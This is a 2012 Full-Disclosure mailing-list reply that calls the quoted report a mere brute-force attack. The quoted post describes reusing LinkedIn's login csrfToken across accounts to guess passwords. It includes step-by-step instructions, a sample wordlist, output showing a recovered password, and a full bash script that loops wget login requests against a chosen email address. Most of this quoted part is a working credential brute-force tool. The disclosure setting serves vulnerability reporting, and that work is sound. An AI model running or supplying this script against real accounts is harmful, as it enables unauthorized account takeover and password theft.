Where's the csrf? All I see here is an useless bruteforce attack. 2012/5/17 Fernando A. Lagos B. <[email protected]>
> LinkedIn uses a Token into the login form which can be used many times > for different usernames. You can do it using the same IP or differents > IP, the token will not be verified. > > > > I. Step by step > =============== > 1). Login into your LinkedIn account and capture the "sourceAlias" and > "csrfToken" variable (example: > > sourceAlias=0_7r5yezRXCiA_H0CRD8sf6DhOjTKUNps5xGTqeX8EEoi&csrfToken=ajax%3A6265303044444817496) > > 2). Use the Token to login into another account: > > https://www.linkedin.com/uas/login-submit?csrfToken=ajax%3A6265303044444817496&[email protected]&session_password=ANY_PASSWORD&session_redirect=&sourceAlias=0_7r5yezRXCiA_H0CRD8sf6DhOjTKUNps5xGTqeX8EEoi&source_app=&trk=secureless > > session_key is the username and session_password is the password. > > 3). The password (session_password) is not correct If the requested URL > returns "The email address or password you provided does not match our > records", else the password if correct. > > > > II. PoC > ======= > > 1). The Wordlist (filename: w) > [zerial@belcebu ~]$ cat w > asdfgh > zxcvbnm > 1234567 > 0987654 > 12345698 > 456_4567 > 123456qwert > qwsdcv > 12wedfgh > 123456qwerty > 12345qwei > 112233 > [zerial@belcebu ~]$ > > > 2). Executing the script: > [zerial@belcebu ~]$ sh linkedin.sh [email protected] w > Password found: qwsdcv > [zerial@belcebu ~]$ > > This is the correct password for this test user. > > > > > III. Script > =========== > > #!/bin/bash > # > # usage: ./linkedin.sh [email protected] wordlist > # > > TOKEN="ajax%3A6265303044444817496" > sourceAlias="0_7r5yezRXCiA_H0CRD8sf6DhOjTKUNps5xGTqeX8EEoi" > > if [ ! -f $2 ]; > then > echo "file $2 does not exists" > exit > fi > > _USR=$1 > for _PWD in $(cat $2); > do > if [ $(echo -n $_PWD|wc -c) -lt 6 ]; > then > echo "Ignoring $_PWD (must be grather than 6 chars)"; > continue > fi > wget -o /dev/null -O - > " > https://www.linkedin.com/uas/login-submit?csrfToken=$TOKEN&session_key=$_USR&session_password=$_PWD&session_redirect=&sourceAlias=$sourceAlias&source_app=&trk=secureless > "|grep > 'The email address or password you provided does not match our > records\|captcha' >>/dev/null > if [ $? -eq 1 ]; > then > echo "Password found: $_PWD"; exit; > fi > done > > echo "Password NOT found. Try later." > #EOF > > > > > > More info (in spanish): > > http://blog.zerial.org/seguridad/vulnerabilidad-en-linkedin-permite-obtencion-de-contrasenas/ > > > > > cheers, > -- > Fernando A. Lagos Berardi > Seguridad Informatica > GNU/Linux User #382319 > Blog: http://blog.zerial.org > Jabber: [email protected] > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ >
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
